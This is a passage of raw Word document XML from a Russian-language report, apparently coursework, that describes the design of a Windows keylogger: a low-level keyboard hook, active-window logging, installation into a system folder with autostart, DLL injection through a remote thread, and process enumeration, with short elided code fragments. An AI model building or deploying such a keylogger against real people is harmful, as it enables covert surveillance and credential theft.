    </w:p>
    <w:p w:rsidR="00712AC9" w:rsidRPr="00712AC9" w:rsidRDefault="00712AC9" w:rsidP="00712AC9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2355"/>
        </w:tabs>
        <w:spacing w:after="240"/>
        <w:ind w:left="708"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00712AC9">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>if (nCode == HC_ACTION &amp;&amp; (wParam == WM_KEYDO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WN || wParam == WM_SYSKEYDOWN))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00712AC9" w:rsidRPr="001B7A51" w:rsidRDefault="00712AC9" w:rsidP="00AA410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ри вызове функции </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LowLevelKeyboardHook</w:t>
      </w:r>
      <w:r w:rsidRPr="00712AC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тся текущее состояние активного окна</w:t>
      </w:r>
      <w:r w:rsidRPr="00712AC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потока и название окна. Если текущее состояние не соответствует состоянию </w:t>
      </w:r>
      <w:r w:rsidR="00AA4103">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>активного окна при пошлом вызове функции, то данное изменение записывается в лог-файл</w:t>
      </w:r>
      <w:r w:rsidR="001B7A51" w:rsidRPr="001B7A51">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984B5C" w:rsidRDefault="00712AC9" w:rsidP="00AA410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олуения информации о нажатой клавише были разработаны функции </w:t>
      </w:r>
      <w:r w:rsidRPr="00712AC9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>getCharKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00712AC9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>getSysKey</w:t>
      </w:r>
      <w:r w:rsidR="00AA4103">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, они возвращают значения </w:t>
      </w:r>
      <w:r w:rsidR="00AA4103">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidR="00AA4103" w:rsidRPr="00AA4103">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AA4103">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>при нажатии клавиши-символа и системной клавиши соответственно.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B7A51" w:rsidRPr="001B7A51" w:rsidRDefault="001B7A51" w:rsidP="001B7A51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B7A51">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001B7A51">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>if (getSysKey(ks-&gt;vkCode))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B7A51" w:rsidRPr="001B7A51" w:rsidRDefault="001B7A51" w:rsidP="001B7A51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B7A51">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001B7A51">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>{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… </w:t>
      </w:r>
      <w:r w:rsidRPr="001B7A51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1B7A51" w:rsidRPr="001B7A51" w:rsidRDefault="001B7A51" w:rsidP="001B7A51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B7A51">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001B7A51">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>else if (getCharKey(ks-&gt;vkCode, ks-&gt;scanCode, (LPWORD) buf, winID))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B7A51" w:rsidRPr="001C1985" w:rsidRDefault="001B7A51" w:rsidP="001B7A51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</w:r>
      <w:r w:rsidRPr="001C1985">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>{ … }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B7A51" w:rsidRPr="001C1985" w:rsidRDefault="001B7A51" w:rsidP="001B7A51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1C1985">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001C1985">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001B7A51">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>else</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B7A51" w:rsidRPr="001C1985" w:rsidRDefault="001B7A51" w:rsidP="001B7A51">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="426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1C1985">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="001C1985">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">{ … </w:t>
      </w:r>
      <w:r w:rsidRPr="001B7A51">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B50CE" w:rsidRDefault="00AA4103" w:rsidP="001B7A5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лучения информации о нажатых клавишах используется с</w:t>
      </w:r>
      <w:r w:rsidR="00984B5C" w:rsidRPr="00984B5C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>труктура KBDLLHOOKSTRUCT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Она</w:t>
      </w:r>
      <w:r w:rsidR="00984B5C" w:rsidRPr="00984B5C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> содержит информацию о низкоуровневом событии ввода данных с клавиатуры.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00891D34" w:rsidRPr="007352E5" w:rsidRDefault="001C1985" w:rsidP="007352E5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20705265"/>
      <w:bookmarkStart w:id="23" w:name="_Toc420752651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03476" w:rsidRPr="007352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14663" w:rsidRPr="007352E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D413B" w:rsidRPr="007352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3476" w:rsidRPr="007352E5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Процедура установки программы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
      <w:bookmarkEnd w:id="23"/>
      <w:r w:rsidR="00403476" w:rsidRPr="007352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91D34" w:rsidRPr="00891D34" w:rsidRDefault="00891D34" w:rsidP="007352E5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00891D3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установки приложения была разработана функция </w:t>
      </w:r>
      <w:r w:rsidRPr="00891D34">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>bool Install(char* injectionDllName)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. – </w:t>
      </w:r>
      <w:r w:rsidR="007352E5">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">данная функция </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>копирует исполняемый файл и инжектируемую библиотеку в директорию операционной системы и устанавливает программу в автозагрузку</w:t>
      </w:r>
      <w:r w:rsidRPr="00891D34">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Возвращает значение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidRPr="00891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пешной установке, при ошибке возвращает значение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r w:rsidRPr="00891D34">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00891D34" w:rsidRPr="007352E5" w:rsidRDefault="00891D34" w:rsidP="007352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jectionDllName</w:t>
      </w:r>
      <w:r w:rsidRPr="00891D34">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>имя инжектируемой библиотеки, которая должна находи</w:t>
      </w:r>
      <w:r w:rsidR="007352E5">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>тся рядом с исполняемым файлом.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E7A2E" w:rsidRPr="007352E5" w:rsidRDefault="001C1985" w:rsidP="007352E5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20705266"/>
      <w:bookmarkStart w:id="25" w:name="_Toc420752652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352E5" w:rsidRPr="007352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52E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E7A2E" w:rsidRPr="007352E5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Процедура инжекции библиотеки</w:t>
      </w:r>
      <w:bookmarkEnd w:id="24"/>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w:rsidR="001B7A51" w:rsidRDefault="002E7A2E" w:rsidP="007352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кция библиотеки производится с помощью функции </w:t>
      </w:r>
      <w:r w:rsidR="006D47FF" w:rsidRPr="006D47FF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>bool Inject(DWORD pId, char *dllName)</w:t>
      </w:r>
      <w:r w:rsidR="006D47FF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – функция открывает существующий объект процесса с </w:t>
      </w:r>
      <w:r w:rsidR="00836C5E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">идентификатором </w:t>
      </w:r>
      <w:r w:rsidR="006D47FF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>процесса</w:t>
      </w:r>
      <w:r w:rsidR="00836C5E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00836C5E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>pId</w:t>
      </w:r>
      <w:r w:rsidR="00836C5E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B709E0" w:rsidRPr="00B709E0" w:rsidRDefault="00836C5E" w:rsidP="007352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загружается адрес функции </w:t>
      </w:r>
      <w:r w:rsidRPr="00836C5E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>LoadLibraryA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> из динамической библиотеки </w:t>
      </w:r>
      <w:r w:rsidRPr="00836C5E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>kernel32.dll</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. После чего в открытом процессе выделяется память для инжектируемой библиотеки, и инжектируемая библиотека записывается в адресное пространство открытого процесса. Дистанционно создается новый поток в открытом процессе, выполняющий код инжектируемой библиотеки.</w:t>
      </w:r>
      <w:r w:rsidR="00B709E0" w:rsidRPr="00B709E0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B709E0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Возвращает значение </w:t>
      </w:r>
      <w:r w:rsidR="00B709E0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>true</w:t>
      </w:r>
      <w:r w:rsidR="00B709E0" w:rsidRPr="00891D34">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B709E0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">при успешной инжекции, при ошибке возвращает значение </w:t>
      </w:r>
      <w:r w:rsidR="00B709E0">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r w:rsidR="00B709E0" w:rsidRPr="00891D34">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002E7A2E" w:rsidRDefault="00B709E0" w:rsidP="007352E5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D47FF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>DWORD pId</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – идентификатор процесса для инжекции.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0095536E" w:rsidRPr="007352E5" w:rsidRDefault="00B709E0" w:rsidP="007352E5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D47FF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>char *dllName</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007352E5">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>– имя инжектируемой библиотеки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B709E0" w:rsidRPr="007352E5" w:rsidRDefault="001C1985" w:rsidP="007352E5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20705267"/>
      <w:bookmarkStart w:id="27" w:name="_Toc420752653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352E5" w:rsidRPr="007352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52E5" w:rsidRPr="001B7A5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709E0" w:rsidRPr="007352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536E" w:rsidRPr="007352E5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Процедура получения снимка процессов</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w:rsidR="0095536E" w:rsidRDefault="001000EB" w:rsidP="007352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ANDLE</w:t>
      </w:r>
      <w:r w:rsidRPr="001000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API</w:t>
      </w:r>
      <w:r w:rsidRPr="001000EB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001000EB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CreateTo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>olhelp</w:t>
      </w:r>
      <w:r w:rsidRPr="001000EB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Snapshot</w:t>
      </w:r>
      <w:r w:rsidRPr="001000E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WORD</w:t>
      </w:r>
      <w:r w:rsidRPr="001000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wFlags</w:t>
      </w:r>
      <w:r w:rsidRPr="001000EB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="001000EB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DWORD</w:t>
      </w:r>
      <w:r w:rsidRPr="001000EB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001000EB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidRPr="001000EB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r w:rsidRPr="001000EB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ProcessID</w:t>
      </w:r>
      <w:r w:rsidRPr="001000EB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">) - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>м</w:t>
      </w:r>
      <w:r w:rsidRPr="001000EB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>оментальный снимок из указанных</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> процессов, а также кучи, модулей и потоков</w:t>
      </w:r>
      <w:r w:rsidRPr="001000EB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, используемые этими процессами.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D2F8C" w:rsidRDefault="008D2F8C" w:rsidP="007352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WORD</w:t>
      </w:r>
      <w:r w:rsidRPr="001000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wFlags</w:t>
      </w:r>
      <w:r w:rsidRPr="008D2F8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асти системы, которые будут включены в снимок. Для получения снимка всех процессов — это параметр должен устанавливаться в </w:t>
      </w:r>
      <w:r w:rsidRPr="008D2F8C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>TH32CS_SNAPPROCESS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D2F8C" w:rsidRPr="008D2F8C" w:rsidRDefault="008D2F8C" w:rsidP="007352E5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001000EB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DWORD</w:t>
      </w:r>
      <w:r w:rsidRPr="008D2F8C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001000EB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidRPr="008D2F8C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>32</w:t>
      </w:r>
      <w:r w:rsidRPr="001000EB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ProcessID</w:t>
      </w:r>
      <w:r w:rsidRPr="008D2F8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ля</w:t>
      </w:r>
      <w:r w:rsidRPr="008D2F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wFlags</w:t>
      </w:r>
      <w:r w:rsidRPr="008D2F8C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> TH32CS_SNAPPROCESS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>этот</w:t>
      </w:r>
      <w:r w:rsidRPr="008D2F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метр</w:t>
      </w:r>
      <w:r w:rsidRPr="008D2F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гнорируется</w:t>
      </w:r>
      <w:r w:rsidRPr="008D2F8C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D2F8C" w:rsidRPr="007352E5" w:rsidRDefault="008D2F8C" w:rsidP="007352E5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D2F8C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Если функция завершается успешно, она возвращает открыты</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>й дескриптор к указанному снимку</w:t>
      </w:r>
      <w:r w:rsidRPr="008D2F8C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D2F8C" w:rsidRPr="007352E5" w:rsidRDefault="008D2F8C" w:rsidP="008D2F8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352E5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, NULL);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D2F8C" w:rsidRPr="007352E5" w:rsidRDefault="008D2F8C" w:rsidP="008D2F8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352E5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>if (hProcessSnap == INVALID_HANDLE_VALUE)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D2F8C" w:rsidRPr="007352E5" w:rsidRDefault="008D2F8C" w:rsidP="008D2F8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352E5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="007352E5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8D2F8C" w:rsidRPr="007352E5" w:rsidRDefault="008D2F8C" w:rsidP="008D2F8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352E5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>pe32.dwSize = sizeof(PROCESSENTRY32);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008D2F8C" w:rsidRPr="007352E5" w:rsidRDefault="008D2F8C" w:rsidP="008D2F8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352E5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
        <w:t>do {</w:t>
      </w:r>
    </w:p>
